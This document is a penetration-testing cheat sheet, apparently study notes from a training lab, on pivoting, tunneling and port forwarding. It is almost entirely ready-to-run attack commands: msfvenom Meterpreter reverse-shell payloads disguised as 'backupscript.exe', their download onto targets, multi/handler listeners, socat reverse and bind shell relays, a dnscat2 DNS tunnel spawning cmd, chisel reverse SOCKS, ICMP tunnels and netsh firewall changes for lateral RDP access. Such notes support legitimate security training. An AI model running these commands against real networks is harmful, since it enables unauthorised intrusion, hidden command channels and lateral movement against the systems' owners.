Pivoting, Tunneling, and Port Forwarding

Dynamic Port Forwarding with SSH and SOCKS Tunneling

Local Port Forwarding

# 1234 - attack host port
# 3306 - target host port
ssh -L 1234:localhost:3306 Ubuntu@ip

# Confirm 
netstat -antp | grep 1234

# Multiple port forward
ssh -L 1234:localhost:3306 8080:localhost:80 ubuntu@ip

Dynamic Port Forwarding

# Enabling Dynamic Port Forwarding
# 9050 - attack host port
ssh -D 9050 ubuntu@ip

# Editing proxychains configuration file /etc/proxychains.conf
# We can add socks4 127.0.0.1 9050 to the last line if it is not already there.

# Checking /etc/proxychains.conf
tail -4 /etc/proxychains.conf

# Using Nmap with Proxychains
proxychains nmap -v -sn 172.16.5.1-200 <--ip range which we were not able to scan before, i.e Internal Network
 
# Using Metasploit with Proxychains
proxychains msfconsole

# Using xfreerdp with Proxychains
proxychains xfreerdp /v:ip /u:eren /p:pass

Remote/Reverse Port Forwarding with SSH

# Creating a Windows Payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

# Configuring & Starting the multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000

# Transferring Payload to Pivot Host
scp backupscript.exe ubuntu@<ipAddressofTarget>:~/

# Starting Python3 Webserver on Pivot Host
python3 -m http.server 8123

# Downloading Payload from Windows Target
PS C:\\Windows\\system32> Invoke-WebRequest -Uri "<http://172.16.5.129:8123/backupscript.exe>" -OutFile "C:\\backupscript.exe"

# SSH remote port forwarding
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

# RUN the payload and get a shell

Meterpreter Tunneling & Port Forwarding

# Creating Payload for Ubuntu Pivot Host
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.10 -f elf -o backupjob LPORT=8080

# Configuring & Starting the multi/handler
set lhost 0.0.0.0
set lport 8080
set payload linux/x64/meterpreter/reverse_tcp

# Transfer and Execute the Payload on the Pivot Host

# After we get shell on Pivot host, we can user meterpreter modules for different tasks
# Ping Sweep module
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

# Ping Sweep For Loop on Linux Pivot Hosts
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

# Ping Sweep For Loop Using CMD
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

# Ping Sweep Using PowerShell
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

# **Configuring MSF's SOCKS Proxy**

use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST 0.0.0.0
set version 4a

# Confirming Proxy Server is Running
jobs

# Adding a Line to proxychains.conf if Needed
socks4 	127.0.0.1 9050

# Creating Routes with AutoRoute
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run autoroute -s 172.16.5.0/23

# Testing Proxy & Routing Functionality
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

Port Forwarding - portfwd module

# Creating Local TCP Relay
portfwd add -l 3300 -p 3389 -r 172.16.5.19

# Connecting to Windows Target through localhost
xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Meterpreter Reverse Port Forwarding

# Reverse Port Forwarding Rules
portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

# Configuring & Starting multi/handler
# If we have a shell already, run bg command
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 8081
set LHOST 0.0.0.0

# Generating the Windows Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234

Socat

Socat Redirection with a Reverse Shell

# Starting Socat Listener on pivot host
# 10.10.14.18:80 - atttack host ip and port 
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

# Creating the Payload - Windows
# 172.16.5.129 - ip of pivot host 
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

# Configuring & Starting the multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80

Socat Redirection with a Bind Shell

# Creating the Payload - Windows
# Bind shell
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443

# Starting Socat Bind Shell Listener
# 172.16.5.19:8443 - ip, port of system on internal network
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

# Configuring & Starting the Bind multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.129.202.64 <-- ip of pivot host
set LPORT 8080 <-- port of pivot host

SSH for Windows: plink.exe

Dynamic port forwarding

# This starts an SSH session between the Windows attack host and the Ubuntu server, and then plink starts listening on port 9050.
plink -D 9050 ubuntu@10.129.15.50

# Proxifier - <https://www.proxifier.com/>
Proxifier can be used to start a SOCKS tunnel via the SSH session we created.

SSH Pivoting with Sshuttle

# Installation
sudo apt-get install sshuttle

# Running Sshuttle
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Web Server Pivoting with Rpivot

# Installation
sudo git clone <https://github.com/klsecservices/rpivot.git>

# python 2.7
sudo apt-get install python2.7

# Running server.py from the Attack Host
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

# Transfering rpivot to the Target
scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

# Running client.py from Pivot Target
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999

# Browsing to the Target Webserver using Proxychains
proxychains firefox-esr 172.16.5.135:80

# Connecting to a Web Server using HTTP-Proxy & NTLM Auth
python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Port Forwarding with Windows Netsh

# Using Netsh.exe to Port Forward
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

# Verifying Port Forward
netsh.exe interface portproxy show v4tov4

# changing firewall rules to allow the traffic (if needed)
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=192.168.151.10 localport=8080 action=allow

# Connecting to the Internal Host through the Port Forward 
# traffice for 10.129.15.150:8080(pivot host ) will be forwarded to 172.16.5.25:3389(internal network host)
xfreerdp /v:10.129.15.150:8080 /u:eren /p:pass

DNS Tunneling with Dnscat2

# Cloning dnscat2 and Setting Up the Server
git clone <https://github.com/iagox86/dnscat2.git>
cd dnscat2/server/
gem install bundler
bundle install

# Starting the dnscat2 server, save secret key for future authentication 
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=domain.local --no-cache

# Cloning dnscat2-powershell to the Attack Host
git clone <https://github.com/lukebaggett/dnscat2-powershell.git>

# Importing dnscat2.ps1
PS C:\> Import-Module .\\dnscat2.ps1

# establish a tunnel with the server running on our attack host.
PS C:\> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain domain.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

# If eveything wokrs, we will get a shell, can use it to interact  
# Listing dnscat2 Options
dnscat2> ?

# Interacting with the Established Session 
dnscat2> window -i 1

SOCKS5 Tunneling with Chisel

# Setting Up & Using Chisel
git clone <https://github.com/jpillora/chisel.git>
cd chisel
go build

# Transferring Chisel Binary to Pivot Host
scp chisel ubuntu@10.129.202.64:~/

# Running the Chisel Server on the Pivot Host
./chisel server -v -p 1234 --socks5

# Connecting to the Chisel Server
./chisel client -v 10.129.202.64:1234 socks

# Editing & Confirming proxychains.conf
socks5 127.0.0.1 1080

# Pivoting to the DC
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Chisel Reverse Pivot

# Starting the Chisel Server on our Attack Host
sudo ./chisel server --reverse -v -p 1234 --socks5

# Then we connect from the pivot host to our attack host, using the option R:socks
./chisel client -v 10.10.14.17:1234 R:socks

# Editing & Confirming proxychains.conf
socks5 127.0.0.1 1080

# Pivoting to internal host
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

ICMP Tunneling with SOCKS

# Setting Up & Using ptunnel-ng
git clone <https://github.com/utoni/ptunnel-ng.git>

# Building Ptunnel-ng with Autogen.sh
sudo ./autogen.sh

# Transferring Ptunnel-ng to the Pivot Host
scp -r ptunnel-ng ubuntu@10.129.202.64:~/

# Starting the ptunnel-ng Server on the Target Host
sudo ./ptunnel-ng -r10.129.202.64 -R22

# Connecting to ptunnel-ng Server from Attack Host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

# Tunneling an SSH connection through an ICMP Tunnel
ssh -p2222 -lubuntu 127.0.0.1

# Enabling Dynamic Port Forwarding over SSH
ssh -D 9050 -p2222 -lubuntu 127.0.0.1

# Proxychaining through the ICMP Tunnel
proxychains nmap -sV -sT 172.16.5.19 -p3389

PreviousRemote Password Attacks NextFile Encryption

Last updated 3 years ago